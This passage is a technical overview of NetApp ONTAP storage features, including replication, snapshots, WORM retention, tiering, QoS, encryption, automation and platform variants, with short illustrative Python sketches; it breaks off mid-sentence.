SnapRestore is a licensed feature used for reverting the active file system of a FlexVol to a previously created snapshot of that FlexVol by restoring metadata inodes into the active file system. SnapRestore is also used for restoring a single file or LUN from a previously created snapshot of the FlexVol where that object is located. Without a SnapRestore license, in a NAS environment it is possible to see snapshots in a network file share and copy directories and files from them for restore purposes; in a SAN environment there is no comparable way of doing restore operations. In both SAN and NAS environments it is possible to copy files, directories, LUNs and entire FlexVol contents with an ONTAP command, which is free. Copying data this way depends on the size of the object and can be time-consuming, while the SnapRestore mechanism, by restoring metadata inodes into the active file system, is almost instantaneous regardless of the size of the object being restored to its previous state.

FlexGroup
FlexGroup is a free feature introduced in version 9 which utilizes the clustered architecture of the ONTAP operating system. FlexGroup provides cluster-wide scalable NAS access with the NFS and CIFS protocols. A FlexGroup volume is a collection of constituent FlexVol volumes, called simply "constituents", distributed across the nodes of the cluster and transparently aggregated into a single space.
Therefore, a FlexGroup volume aggregates the performance and capacity of all its constituents and thus of all the cluster nodes where they are located. To the end user, each FlexGroup volume is represented by a single, ordinary file share. The full potential of FlexGroup will be revealed with technologies like pNFS (currently not supported with FlexGroup), NFS multipathing (session trunking, also not available in ONTAP), SMB Multichannel (currently not supported with FlexGroup), SMB Continuous Availability (supported with FlexGroup in ONTAP 9.6), and VIP (BGP). The FlexGroup feature in ONTAP 9 allows a single namespace to scale massively to over 20 PB and over 400 billion files, while evenly spreading the performance across the cluster. Starting with ONTAP 9.5, FabricPool is supported with FlexGroup (it is recommended that all the constituent volumes back up to a single S3 bucket); FlexGroup also supports the SMB features native file auditing, FPolicy, Storage-Level Access Guard (SLAG), copy offload (ODX) and inherited watches of change notifications, as well as quotas and qtrees. SMB Continuous Availability (CA) support on FlexGroup allows running MS SQL & Hyper-V on FlexGroup, and FlexGroup is supported on MetroCluster.

SnapMirror
Snapshots form the basis for NetApp's asynchronous disk-to-disk (D2D) replication technology, SnapMirror, which effectively replicates flexible volume snapshots between any two ONTAP systems. SnapMirror is also supported from ONTAP to Cloud Backup and from SolidFire to ONTAP systems as part of NetApp's Data Fabric vision. NetApp also offers a D2D backup and archive feature named SnapVault, which is based on replicating and storing snapshots. Open Systems SnapVault allows Windows and UNIX hosts to back up data to an ONTAP system and store any filesystem changes in snapshots (not supported in ONTAP 8.3 and onwards).
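The idea behind snapshot-based asynchronous replication — send a baseline once, then transfer only the blocks that changed between two snapshots — can be sketched conceptually. This is not WAFL internals, just a minimal illustration of the delta-transfer principle.

```python
# Conceptual sketch of snapshot-based asynchronous replication: after an
# initial baseline transfer, only blocks changed between two snapshots
# cross the wire to the destination.

def snapshot(volume):
    """A snapshot here is simply a point-in-time copy of the block map."""
    return dict(volume)

def delta(old_snap, new_snap):
    """Blocks added or changed since the previous snapshot."""
    return {blk: data for blk, data in new_snap.items()
            if old_snap.get(blk) != data}

# baseline transfer
source = {0: "a", 1: "b"}
snap1 = snapshot(source)
destination = dict(snap1)

# source changes; only the delta is transferred
source[1] = "B"
source[2] = "c"
snap2 = snapshot(source)
destination.update(delta(snap1, snap2))
```

After the incremental update, the destination matches the source's latest snapshot, while only two changed blocks were transferred instead of the whole volume.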
SnapMirror is designed to be part of a disaster recovery plan: it stores an exact copy of the data as of the time the snapshot was created on the disaster recovery site and can keep the same snapshots on both systems. SnapVault, on the other hand, is designed to keep fewer snapshots on the source storage system and more snapshots on a secondary site for a long period of time. Data captured in SnapVault snapshots on the destination system cannot be modified or accessed read-write on the destination; the data can be restored back to the primary storage system, or the SnapVault snapshot can be deleted. Data captured in snapshots on both sites, with both SnapMirror and SnapVault, can be cloned and modified with the FlexClone feature for data cataloging, backup consistency and validation, test and development purposes, etc. Later versions of ONTAP introduced cascading replication, where one volume can replicate to another, and then another, and so on. A configuration called fan-out is a deployment where one volume is replicated to multiple storage systems. Both fan-out and cascade replication deployments support any combination of SnapMirror DR, SnapVault, or unified replication. It is possible to use a fan-in deployment to create data protection relationships between multiple primary systems and a single secondary system: each relationship must use a different volume on the secondary system. Starting with ONTAP 9.4, destination SnapMirror & SnapVault systems enable automatic inline & offline deduplication by default. Intercluster describes a SnapMirror relationship between two clusters, while intracluster is the opposite and describes a SnapMirror relationship between storage virtual machines (SVMs) in a single cluster. SnapMirror can operate in version-dependent mode, where the two storage systems must run the same version of ONTAP, or in version-flexible mode. Types of SnapMirror replication: Data Protection (DP): Also known as SnapMirror DR.
A version-dependent replication type originally developed by NetApp for Volume SnapMirror; the destination system must run the same or a higher version of ONTAP. Not used by default in ONTAP 9.3 and higher. Volume-level replication, block-based, metadata-independent, uses the Block-Level Engine (BLE). Extended Data Protection (XDP): Used by SnapMirror unified replication and SnapVault. XDP uses the Logical Replication Engine (LRE) or, if volume efficiency differs on the destination volume, the Logical Replication Engine with Storage Efficiency (LRSE). Used as volume-level replication, but technologically it could be used for directory-based replication; it is inode-based and metadata-dependent (and therefore not recommended for NAS with millions of files). Load Sharing (LS): Mostly used for internal purposes, like keeping copies of an SVM's root volume. SnapMirror to Tape (SMTape): Snapshot-copy-based incremental or differential backup from volumes to tapes; the SMTape feature performs a block-level tape backup using NDMP-compliant backup applications such as CommVault Simpana. SnapMirror-based technologies: Unified replication: A volume with unified replication can receive both SnapMirror and SnapVault snapshots. Unified replication is a combination of SnapMirror unified replication and SnapVault using a single replication connection. Both SnapMirror unified replication and SnapVault use the same XDP replication type. SnapMirror unified replication is also known as version-flexible SnapMirror. Version-flexible SnapMirror/SnapMirror unified replication was introduced in ONTAP 8.3 and removes the restriction that the destination storage must use the same, or a higher, version of ONTAP. SVM-DR (SnapMirror SVM): replicates all volumes (exceptions allowed) in a selected SVM and some of the SVM settings; the replicated settings depend on the protocol used (SAN or NAS). Volume Move: Also known as DataMotion for Volumes.
SnapMirror replicates a volume from one aggregate to another within a cluster, then I/O operations stop for a timeout acceptable to end clients, the final replica is transferred to the destination, the source is deleted and the destination becomes read-write accessible to its clients. SnapMirror is a licensed feature; a SnapVault license is not required if a SnapMirror license is already installed.

SVM-DR
SVM DR is based on SnapMirror technology and transfers all the volumes (exceptions allowed) and the data in them from a protected SVM to a DR site. There are two modes for SVM DR: identity preserve and identity discard. With identity discard mode, on the one hand, the data in the volumes is copied to the secondary system, and the DR SVM does not preserve information such as the SVM configuration, IP addresses and CIFS AD integration of the original SVM. On the other hand, in identity discard mode the data on the secondary system can be brought online in read-write mode while the primary system is still online, which can be helpful for DR testing, test/dev and other purposes. Identity discard therefore requires additional configuration on the secondary site in case a disaster occurs on the primary site. In identity preserve mode, SVM-DR copies the volumes and the data in them along with information such as the SVM configuration, IP addresses and CIFS AD integration, which requires less configuration on the DR site in case of a disaster event on the primary site; but in this mode the primary system must be offline to ensure there will be no conflict.

SnapMirror Synchronous
SnapMirror Sync (SM-S for short) is a zero-RPO data replication technology previously available in 7-mode systems that was not available in (clustered) ONTAP until version 9.5. SnapMirror Sync replicates data at the volume level and requires an RTT of less than 10 ms, which gives a distance of approximately 150 km.
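A zero-RPO synchronous write path acknowledges a write only after both sites have it. A minimal sketch of that behavior, including the two failure-handling modes (strict rejection versus continuing on the primary and re-syncing later), follows; this is an illustration only, as SnapMirror Sync's actual replication engine is not public.

```python
# Illustrative zero-RPO write path: in full sync mode a write is rejected
# if replication fails; in relaxed mode the primary keeps accepting writes
# and the secondary catches up on re-sync.

class SyncReplica:
    def __init__(self):
        self.primary = []
        self.secondary = []
        self.link_up = True

    def write(self, data, relaxed=False):
        if self.link_up:
            self.primary.append(data)
            self.secondary.append(data)   # both sites have the write
            return "ack"
        if relaxed:
            self.primary.append(data)     # re-sync will catch secondary up
            return "ack-primary-only"
        return "write-rejected"           # zero data loss guaranteed
```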
SnapMirror Sync can work in two modes: Full Synchronous mode (the default), which guarantees zero application data loss between the two sites by disallowing writes if SnapMirror Sync replication fails for any reason; and Relaxed Synchronous mode, which allows an application to continue writing on the primary site if SnapMirror Sync fails; once the relationship is resumed, an automatic re-sync occurs. SM-S supports the FC, iSCSI, NFSv3, NFSv4, SMB v2 & SMB v3 protocols, has a limit of 100 volumes for AFF, 40 volumes for FAS and 20 for ONTAP Select, and works on any controller with 16 GB of memory or more. SM-S is useful for replicating transactional logs from Oracle DB, MS SQL, MS Exchange, etc. Source and destination FlexVol volumes can be in a FabricPool aggregate but must use the backup policy; FlexGroup volumes and quotas are not currently supported with SM-S. SM-S is not a free feature; the license is included in the premium bundle. Unlike SyncMirror, SM-S does not use RAID & plex technologies and can therefore be configured between two different NetApp ONTAP storage systems with different disk types & media.

FlexCache Volumes
FlexCache is a technology previously available in 7-mode systems that was not available in (clustered) ONTAP until version 9.5. FlexCache allows serving NAS data across multiple global sites with file-locking mechanisms. FlexCache volumes can cache reads, writes, and metadata. A write on an edge system generates a push of the modified data to all the edge ONTAP systems that have requested that data from the origin, whereas in 7-mode all writes went to the origin and it was the edge ONTAP system's job to check whether the file had been updated. FlexCache volumes can also be smaller than the origin volume, which is another improvement compared to 7-mode. Initially, only NFS v3 is supported with ONTAP 9.5. FlexCache volumes are sparsely populated within an ONTAP cluster (intracluster) or across multiple ONTAP clusters (intercluster).
FlexCache communicates with other nodes over intercluster interface LIFs. Licenses for FlexCache are based on total cluster cache capacity and are not included in the premium bundle. FAS, AFF & ONTAP Select systems can be combined to use FlexCache technology. It is possible to create 10 FlexCache volumes per origin FlexVol volume, and up to 10 FlexCache volumes per ONTAP node. The origin volume must be a FlexVol, while all the FlexCache volumes have the FlexGroup volume format.

SyncMirror
Data ONTAP also implements an option named RAID SyncMirror (RSM), using the plex technique: all the RAID groups within an aggregate or traditional volume can be synchronously duplicated to another set of hard disks. This is typically done at another site via a Fibre Channel or IP link, or within a single controller with local SyncMirror for single-disk-shelf resiliency. NetApp's MetroCluster configuration uses SyncMirror to provide a geo-cluster or an active/active cluster between two sites up to 300 km apart, or 700 km with ONTAP 9.5 and MCC-IP. SyncMirror can be used on software-defined storage platforms, on Cloud Volumes ONTAP, or on ONTAP Select. It provides high availability in environments with directly attached (non-shared) disks on top of commodity servers, and on FAS and AFF platforms in local SyncMirror or MetroCluster configurations. SyncMirror is a free feature.

SnapLock
SnapLock implements Write Once Read Many (WORM) functionality on magnetic and SSD disks rather than optical media, so that data cannot be deleted until its retention period has been reached. SnapLock exists in two modes: compliance and enterprise.
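The WORM retention semantics — a committed file cannot be deleted before its retention time, and the retention period may only ever be extended — can be sketched as follows. This is an illustrative model of the rules the text describes, not ONTAP code.

```python
# Illustrative WORM retention model: delete is refused before the retention
# time, and retention can be extended but never shortened.

class WormFile:
    def __init__(self, name, retain_until):
        self.name = name
        self.retain_until = retain_until   # e.g. a Unix timestamp or day number

    def extend_retention(self, new_time):
        if new_time < self.retain_until:
            raise ValueError("retention period cannot be shortened")
        self.retain_until = new_time

    def delete(self, now):
        if now < self.retain_until:
            raise PermissionError("file is under WORM retention")
        return True
```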
Compliance mode was designed to assist organizations in implementing a comprehensive archival solution that meets strict regulatory retention requirements, such as those dictated by the SEC 17a-4(f) rule, FINRA, HIPAA, CFTC Rule 1.31(b), DACH, Sarbanes-Oxley, GDPR, Check 21, EU Data Protection Directive 95/46/EC, NF Z 42-013/NF Z 42-020, Basel III, MiFID, the Patriot Act, the Gramm-Leach-Bliley Act, etc. Records and files committed to WORM storage on a SnapLock Compliance volume cannot be altered or deleted before the expiration of their retention period. Moreover, a SnapLock Compliance volume cannot be destroyed until all data has reached the end of its retention period. SnapLock is a licensed feature. SnapLock Enterprise is geared toward assisting organizations that are more self-regulated and want more flexibility in protecting digital assets with WORM-type data storage. Data stored as WORM on a SnapLock Enterprise volume is protected from alteration or modification. There is one main difference from SnapLock Compliance: as the files being stored are not for strict regulatory compliance, a SnapLock Enterprise volume can be destroyed by an administrator with root privileges on the ONTAP system containing the SnapLock Enterprise volume, even if the designated retention period has not yet passed. In both modes, the retention period can be extended, but not shortened, as this is incongruous with the concept of immutability. Also, NetApp's SnapLock data volumes are equipped with a tamper-proof compliance clock, which is used as a time reference to block forbidden operations on files, even if the system time is tampered with. Starting with ONTAP 9.5, SnapLock supports the unified SnapMirror (XDP) engine, re-synchronization after fail-over without data loss, 1023 snapshots, efficiency mechanisms, and clock synchronization in SDS ONTAP.

FabricPool
FabricPool is available for SSD-only aggregates in FAS/AFF systems or Cloud Volumes ONTAP on SSD media.
Starting with ONTAP 9.4, FabricPool is supported on the ONTAP Select platform. Cloud Volumes ONTAP also supports HDD + S3 FabricPool configurations. FabricPool provides automatic storage tiering of cold data blocks from fast media (usually SSD) on ONTAP storage to cold media, via an object protocol, to object storage such as S3, and back. FabricPool can be configured in two modes: one mode migrates cold data blocks captured in snapshots, while the other migrates cold data blocks of the active file system. FabricPool preserves offline deduplication & offline compression savings. ONTAP 9.4 introduced FabricPool 2.0 with the ability to tier off active file-system data (by default, data not accessed for 31 days) & support for data compaction savings. The recommended ratio of inodes to data files is 1:10. For clients connected to the ONTAP storage system, all FabricPool data-tiering operations are completely transparent; if data blocks become hot again, they are copied back to the fast media in the ONTAP storage system. FabricPool is currently compatible with the NetApp StorageGRID, Amazon S3, Google Cloud, and Alibaba object storage services. Starting with ONTAP 9.4 Azure Blob is supported; starting with 9.5 IBM Cloud Object Storage (ICOS) and Amazon Commercial Cloud Services (C2S) are supported, and other object-based software & services can be used if requested by the user and validated by NetApp. FlexGroup volumes are supported with FabricPool starting with ONTAP 9.5. The FabricPool feature in FAS/AFF systems is free for use with NetApp StorageGRID external object storage. For other object storage such as Amazon S3 & Azure Blob, FabricPool must be licensed per terabyte to function (alongside the cost of FabricPool licensing, the customer also pays for consumed object space).
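The block-temperature policy described above — blocks unread for 31 days move to the object store, and a read of a cold block brings it back to the performance tier — can be sketched conceptually. The data structures below are invented for illustration and simplify the real implementation.

```python
# Conceptual sketch of cold-block tiering: blocks not accessed for 31 days
# (the documented default) are moved to object storage; reading a cold
# block copies it back to fast media.

COOLING_DAYS = 31

def tier(blocks, today):
    """blocks: {id: {"last_access": day_number, "tier": "ssd" | "s3"}}"""
    for blk in blocks.values():
        if blk["tier"] == "ssd" and today - blk["last_access"] >= COOLING_DAYS:
            blk["tier"] = "s3"            # tier cold block to object storage

def read(blocks, blk_id, today):
    blk = blocks[blk_id]
    blk["last_access"] = today
    if blk["tier"] == "s3":
        blk["tier"] = "ssd"               # hot again: copy back to fast media
    return blk
```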
With the Cloud Volumes ONTAP storage system, FabricPool does not require licensing; costs apply only for consumed space on the object storage. Starting with ONTAP 9.5, the capacity-utilization threshold that triggers tiering from the hot tier can be adjusted. SVM-DR is also supported with FlexGroups. FabricPool, first available in ONTAP 9.2, is a NetApp Data Fabric technology that enables automated tiering of data to low-cost object storage tiers either on or off premises. Unlike manual tiering solutions, FabricPool reduces the total cost of ownership by automating the tiering of data to lower-cost storage. It delivers the benefits of cloud economics by tiering to public clouds such as Alibaba Cloud Object Storage Service, Amazon S3, Google Cloud Storage, IBM Cloud Object Storage, and Microsoft Azure Blob Storage, as well as to private clouds such as NetApp StorageGRID. FabricPool is transparent to applications and allows enterprises to take advantage of cloud economics without sacrificing performance or having to re-architect solutions to leverage storage efficiency.

FlashCache
NetApp storage systems running ONTAP can use Flash Cache (formerly Performance Acceleration Module, or PAM), a custom purpose-built proprietary PCIe card for hybrid NetApp FAS systems. Flash Cache can reduce read latencies and allows the storage system to process more read-intensive work without adding further spinning disks to the underlying RAID, since read operations do not require redundancy in case of a Flash Cache failure. Flash Cache works at the controller level and accelerates only read operations. Each volume on the controller can have a different caching policy, or read caching can be disabled for a volume; Flash Cache caching policies are applied at the FlexVol level. Flash Cache technology is compatible with the FlexArray feature. Starting with 9.1, a single FlexVol volume can benefit from both Flash Pool & Flash Cache caches simultaneously.
Beginning with ONTAP 9.5, Flash Cache read-cache technology is available in Cloud Volumes ONTAP with the use of ephemeral SSD drives.

NDAS
NDAS proxy is a service introduced in ONTAP 9.5; it works in conjunction with an NDAS service in a cloud provider. Similarly to FabricPool, NDAS stores data in object format, but unlike FabricPool it stores WAFL metadata in the object storage as well. The information transferred from the ONTAP system consists of snapshot deltas, not the entire set of data, and is already deduplicated & compressed (at the volume level). The NDAS proxy is HTTP-based, with the S3 object protocol and a few additional API calls to the cloud. NDAS in ONTAP 9.5 works only in a scheme where primary ONTAP 9 storage replicates data via SnapMirror to secondary ONTAP 9.5 storage, with the secondary storage also acting as the NDAS proxy.

QoS
Storage QoS is a free feature in ONTAP systems. There are a few types of storage QoS in ONTAP: Adaptive QoS (A-QoS), which includes Absolute Minimum QoS; ordinary static QoS, i.e. Minimum QoS (QoS min); and Maximum QoS (QoS max). Maximum QoS can be configured as a static upper limit in IOPS, MB/s, or both. It can be applied to an object such as a volume, LUN or file to prevent that object from consuming more storage performance resources than defined by the administrator (thus isolating performance-intensive bullies and protecting other workloads). Minimum QoS, by contrast, is set on volumes to ensure that a volume will get no less than the administrator-configured static number of IOPS when there is contention for storage performance resources. A-QoS is a mechanism for automatically changing QoS based on the space consumed in a flexible volume, because the consumed space can grow or shrink and the size of a FlexVol can be changed.
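The Adaptive QoS arithmetic amounts to multiplying the volume's consumed size by a fixed IO-per-TB ratio, with an absolute minimum as a floor for very small volumes. A sketch of that calculation follows; the ratio and minimum values used in the test are invented for illustration and are not NetApp's published policy numbers.

```python
# Sketch of the Adaptive QoS calculation: IOPS limit = consumed TB times a
# fixed IO-per-TB ratio, never below an absolute minimum. Policy values
# here are hypothetical, not real A-QoS policy figures.

def adaptive_qos_iops(used_tb, iops_per_tb, absolute_min_iops):
    """Recomputed whenever the volume's consumed space changes."""
    return max(int(used_tb * iops_per_tb), absolute_min_iops)
```

For example, under a hypothetical 1000 IO/TB policy a volume consuming 2 TB would get a 2000 IOPS ceiling, while a 10 GB volume would fall back to the policy's absolute minimum.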
On FAS systems, A-QoS reconfigures only peak performance (QoS max), while on AFF systems it reconfigures both expected performance (QoS min) and peak performance (QoS max) on a volume. A-QoS allows ONTAP to automatically adjust the number of IOPS for a volume based on A-QoS policies. There are three basic A-QoS policies: Extreme, Performance and Value. Each A-QoS policy has a predefined fixed IO-per-TB ratio for peak performance and expected performance (or Absolute Minimum QoS). Absolute Minimum QoS is used instead of expected performance (QoS min) only when the volume size and the IO-per-TB ratio yield too small a value, for example with a 10 GB volume.

Security
The ONTAP OS has a number of features to increase security on the storage system, such as the Onboard Key Manager, a passphrase for controller boot with NSE & NVE encryption, and a USB key manager (available starting with 9.4). Auditing for NAS events is another security measure in ONTAP that enables the customer to track and log certain CIFS and NFS events on the storage system. This helps to track potential security problems and provides evidence of any security breaches. ONTAP accessed over SSH can authenticate with a Common Access Card. ONTAP supports RBAC: role-based access control allows administrative accounts to be restricted and/or limited in the actions they can take on the system. RBAC prevents a single account from being allowed to perform every potential action available on the system. Beginning with ONTAP 9, Kerberos 5 authentication with privacy service (krb5p) is supported for NAS. The krb5p authentication mode protects against data tampering and snooping by using checksums and encrypting all traffic between client and server. The ONTAP solution supports 128-bit and 256-bit AES encryption for Kerberos.

Key Manager
Onboard Key Manager is a free feature introduced in 9.1 that can store keys for NVE-encrypted volumes & NSE disks. NSE disks are available only on AFF/FAS platforms.
ONTAP systems also allow storing encryption keys on a USB drive connected to the appliance. ONTAP can also use an external key manager like Gemalto Trusted Key Manager.

NetApp Volume Encryption
NetApp Volume Encryption (NVE) is FlexVol volume-level software-based encryption which uses the storage CPU for data encryption; thus some performance degradation is expected, though it is less noticeable on high-end storage systems with more CPU cores. NVE is a licensed but free feature compatible with nearly all NetApp ONTAP features and protocols. Similarly to NetApp Storage Encryption (NSE), NVE can store encryption keys locally or on a dedicated key manager like IBM Security Key Lifecycle Manager, SafeNet KeySecure or cloud key managers. NVE, like NSE, is data-at-rest encryption, which means it protects only against physical disk theft and does not add a level of data-security protection in a healthy, operational, running system. In combination with FabricPool, NVE also protects data from unauthorized access in external S3 storage such as Amazon, and since the data is already encrypted, it is transferred over the wire in encrypted form.

GDPR
Starting with ONTAP 9.4, a new feature called Secure Purge provides the ability to securely delete a file to comply with GDPR requirements.

VSCAN and FPolicy
ONTAP Vscan and FPolicy are aimed at malware prevention on ONTAP systems with NAS. Vscan provides a way for NetApp antivirus scanner partners to verify that files are virus-free. FPolicy integrates with NetApp partners to monitor file-access behavior. The FPolicy file-access notification system monitors activity on NAS storage and prevents unwanted access to or changes of files based on policy settings. Both help prevent ransomware from getting a foothold in the first place.
Additional Functionality
MTU black-hole detection and path MTU discovery (PMTUD) are the processes by which an ONTAP system connected to an Ethernet network detects the maximum MTU size. In ONTAP 9.2: Online Certificate Status Protocol (OCSP) for LDAP over TLS; iSCSI endpoint isolation to specify a range of IP addresses that can log in to the storage; and a limit on the number of failed login attempts over SSH. NTP symmetric authentication is supported starting with ONTAP 9.5.

Software
NetApp offers a set of server-based software solutions for monitoring of, and integration with, ONTAP systems. The most commonly used free software is ActiveIQ Unified Manager & Performance Manager, a data availability and performance monitoring solution.

Workflow Automation
NetApp Workflow Automation (WFA) is a free, server-based product used for NetApp storage orchestration. It includes a self-service portal with a web-based GUI, where nearly all routine storage operations or sequences of operations can be configured as workflows and published as a service, so end users can order and consume NetApp storage as a service.

SnapCenter
SnapCenter, previously known as the SnapManager Suite, is a server-based product. NetApp also offers products for taking application-consistent snapshots by coordinating the application and the NetApp storage array. These products support Microsoft Exchange, Microsoft SQL Server, Microsoft SharePoint, Oracle, SAP and VMware ESX Server data, and they form part of the SnapManager suite. SnapCenter also includes third-party plugins for MongoDB, IBM DB2 and MySQL, and allows end users to create their own plugins for integration with the ONTAP storage system. SnapManager and SnapCenter are enterprise-level licensed products. A similar, free, and less capable NetApp product exists, named SnapCreator. It is intended for customers who wish to integrate ONTAP application-consistent snapshots with their applications but do not have a license for SnapCenter.
NetApp claims that SnapCenter's capabilities will expand to include SolidFire storage endpoints. SnapCenter has controller-based licensing for AFF/FAS systems and per-terabyte licensing for SDS ONTAP. The SnapCenter Plug-in for VMware vSphere, called NetApp Data Broker, is a separate Linux-based appliance which can be used without SnapCenter itself.

Services Level Manager
NetApp Service Level Manager (NSLM for short) is software for provisioning ONTAP storage that delivers predictable performance, capacity and data protection for a workload. It exposes RESTful APIs, has built-in Swagger documentation listing the available APIs, and can be integrated with other NetApp storage products like ActiveIQ Unified Manager. NSLM exposes three standard service levels (SSL) based on service-level objectives (SLO) and can create custom service levels. NSLM was created to provide predictable, service-provider-like storage consumption. NSLM is a space-based licensed product.

Big Data
ONTAP systems can integrate with Hadoop TeraGen, TeraValidate and TeraSort, Apache Hive, Apache MapReduce, the Tez execution engine, Apache Spark, Apache HBase, Azure HDInsight and Hortonworks Data Platform products, and Cloudera CDH, through the NetApp In-Place Analytics Module (also known as the NetApp NFS Connector for Hadoop), to provide access to and analysis of data using external shared NAS storage as primary or secondary Hadoop storage.

Qtrees
A qtree is a logically defined file system with no restrictions on how much disk space can be used or how many files can exist. In general, qtrees are similar to volumes. However, they have the following key restrictions: snapshot copies can be enabled or disabled for individual volumes but not for individual qtrees, and qtrees do not support space reservations or space guarantees.

Automation
ONTAP provisioning & usage can be automated in many ways, either directly or with the use of additional NetApp software or third-party software.
A direct HTTP REST API is available with ONTAP and SolidFire. Starting with ONTAP 9.6, NetApp began bringing proprietary ZAPI functionality to REST API access for cluster management. The REST APIs are available through the System Manager web interface at https://[ONTAP_ClusterIP_or_Name]/docs/api; the page includes a "Try it out" feature, the ability to generate an API token to authorize external use, and built-in documentation with examples. Cluster management available through the REST APIs in ONTAP 9.6 covers:
Cloud (object storage) targets
Cluster, nodes, jobs and cluster software
Physical and logical network
Storage virtual machines
SVM name services such as LDAP, NIS, and DNS
Resources of the storage area network (SAN)
Resources of Non-Volatile Memory Express
The ONTAP SDK software is a proprietary ZAPI interface to automate ONTAP systems. PowerShell commandlets are available to manage NetApp systems including ONTAP, SolidFire & E-Series. SnapMirror & FlexClone toolkits written in Perl can be used to manage SnapMirror & FlexClone with scripts. ONTAP can be automated with Ansible, Puppet, and Chef scripts. NetApp Workflow Automation (WFA) is a GUI-based orchestrator which also provides APIs and PowerShell commandlets for WFA. WFA can manage NetApp ONTAP, SolidFire & E-Series storage systems.
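Addressing the REST API mentioned above can be sketched with the Python standard library. The `/api/storage/volumes` endpoint path and the credentials below are assumptions for illustration; the cluster's built-in /docs/api page is the authoritative list of endpoints.

```python
# Minimal sketch of building a request against the ONTAP REST API using only
# the standard library. Host, user and password are placeholders; the
# endpoint path is an assumption based on the documented volume resources.
import base64
import urllib.request

def volumes_request(cluster, user, password):
    """Build (but do not send) a GET request for the volume inventory."""
    url = "https://%s/api/storage/volumes" % cluster
    token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
    req = urllib.request.Request(url)
    req.add_header("Authorization", "Basic " + token)
    req.add_header("Accept", "application/json")
    return req  # send with urllib.request.urlopen(req) against a real cluster

req = volumes_request("cluster1.example.com", "admin", "secret")
```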
WFA provides a built-in self-service portal for NetApp systems known as Storage as a Service (STaaS). VMware vRealize Orchestrator with WFA can orchestrate storage. Third-party orchestrators for PaaS or IaaS, like Cisco UCS Director (previously Cloupia) and others, can manage NetApp systems; automated workflows can be created with step-by-step instructions to manage & configure infrastructure through the built-in self-service portal. NetApp SnapCenter software, used to integrate backup & recovery on NetApp storage with applications like VMware ESXi, Oracle DB, MS SQL, etc., can be automated through PowerShell commandlets and a RESTful API. ActiveIQ Unified Manager & Performance Manager (formerly OnCommand Unified Manager), for monitoring NetApp FAS/AFF storage systems, performance metrics, and data protection, also provides a RESTful API & PowerShell commandlets. OnCommand Insight, monitoring and analysis software for heterogeneous infrastructure including NetApp ONTAP, SolidFire, E-Series & third-party storage systems & switches, provides a RESTful API and PowerShell commandlets. The NetApp Trident plugin for Docker is used in container environments to provide persistent storage, automate infrastructure or even run infrastructure as code. It can be used with NetApp ONTAP, SolidFire & E-Series systems with SAN & NAS protocols.

Platforms
The ONTAP operating system is used in storage disk arrays. There are three platforms on which ONTAP software is used: NetApp FAS and AFF, ONTAP Select and Cloud Volumes ONTAP. On each platform, ONTAP uses the same kernel and a slightly different set of features; FAS is the richest in functionality among the platforms.

FAS
FAS and All Flash FAS (AFF) systems are proprietary, custom-built hardware from NetApp for ONTAP software. AFF systems can contain only SSD drives, because ONTAP on AFF is optimized and tuned only for flash memory, while FAS systems may contain HDDs (HDD-only systems) or HDDs and SSDs (hybrid systems).
ONTAP on FAS and AFF platforms can create RAID arrays, such as RAID 4, RAID-DP and RAID-TEC arrays, from disks or disk partitions for data-protection purposes, while ONTAP Select and Cloud Volumes ONTAP leverage the RAID data protection provided by the environment they run on. FAS and AFF systems support MetroCluster functionality, while the ONTAP Select and Cloud Volumes ONTAP platforms do not.
Software-Defined Storage
Both ONTAP Select and Cloud Volumes ONTAP are virtual storage appliances (VSAs), based on the earlier product ONTAP Edge (also known as ONTAP-v), and are considered software-defined storage. ONTAP Select, like Cloud Volumes ONTAP, includes the plex and aggregate abstractions but originally had no lower-level RAID module in the OS; RAID 4, RAID-DP and RAID-TEC were therefore not supported, and, similarly to the FlexArray functionality, the ONTAP storage system leveraged the RAID data protection of the underlying storage systems at the SSD and HDD drive level. Starting with ONTAP Select 9.4 & ONTAP Deploy 2.8, software RAID is supported, with no requirement for third-party hardware RAID equipment. Because ONTAP Select and Cloud Volumes ONTAP are virtual machines, they do not support Fibre Channel and Fibre Channel over Ethernet as front-end data protocols; they consume space from the underlying storage in the hypervisor, added to the VSA as virtual disks that are represented and treated inside ONTAP as disks. ONTAP Select and Cloud Volumes ONTAP provide high availability, deduplication, resiliency, data recovery, robust snapshots that can be integrated with application backup (application-consistent snapshots), and nearly all ONTAP functionality, with a few exceptions. Software-defined versions of ONTAP have nearly all the functionality except hardware-centric features such as ifgroups, the service processor, physical disk drives with encryption, MetroCluster over FCP, and the Fibre Channel protocol.
ONTAP Select
ONTAP Select can run on VMware ESXi and Linux KVM hypervisors.
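The single-parity protection underlying schemes like RAID 4 can be illustrated conceptually: a parity block is the XOR of the data blocks in a stripe, so any one lost block can be rebuilt from the parity and the survivors (RAID-DP and RAID-TEC add further parity disks). This is a generic sketch of the idea, not NetApp's implementation:

```python
from functools import reduce

def xor_blocks(blocks):
    """XOR equal-length byte blocks together, byte by byte."""
    return bytes(reduce(lambda a, b: bytes(x ^ y for x, y in zip(a, b)), blocks))

def parity(data_blocks):
    """Compute the parity block for a stripe, as in single-parity RAID 4."""
    return xor_blocks(data_blocks)

def reconstruct(surviving_blocks, parity_block):
    """Rebuild a single lost data block from the parity and surviving blocks."""
    return xor_blocks(surviving_blocks + [parity_block])

if __name__ == "__main__":
    stripe = [b"AAAA", b"BBBB", b"CCCC"]
    p = parity(stripe)
    # Simulate losing the second block and rebuilding it from the rest:
    rebuilt = reconstruct([stripe[0], stripe[2]], p)
    print(rebuilt)  # b'BBBB'
```

Because XOR is its own inverse, reconstruction is the same operation as parity computation, which is why a single parity disk suffices against a single failure.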
ONTAP Select leverages RAID data protection at the SSD and HDD drive level with underlying DAS, SAN, or vSAN storage systems. Starting with ONTAP Select 9.4 & ONTAP Deploy 2.8, software RAID is supported on KVM with no requirement for third-party hardware RAID equipment, and starting with ONTAP 9.5 on ESXi as well. ONTAP Deploy is a virtual machine that provides a mediator function in MetroCluster or 2-node configurations, keeps track of licensing, and is used for initial cluster deployment. Starting with ONTAP Deploy 2.11.2, a vCenter plugin allows all ONTAP Deploy functionality to be performed from vCenter; previously, management was performed either from the command line or with the vSphere OVA setup wizard. As on the FAS platform, ONTAP Select supports high availability and clustering. Like FAS, ONTAP Select is offered in two versions: HDD-only or all-flash optimized. ONTAP Select was previously known as Data ONTAP Edge; that product ran version 8 of the Data ONTAP OS and could run only atop VMware ESXi. Starting with ONTAP 9.5, SW-MetroCluster is supported over an NSX overlay network. Starting with ONTAP 9.5, licensing changed from capacity-tier-based, where perpetual licenses are linked to a node, to Capacity Pool licensing with a time-limited subscription. ONTAP Select 9.5 added support for the MQTT 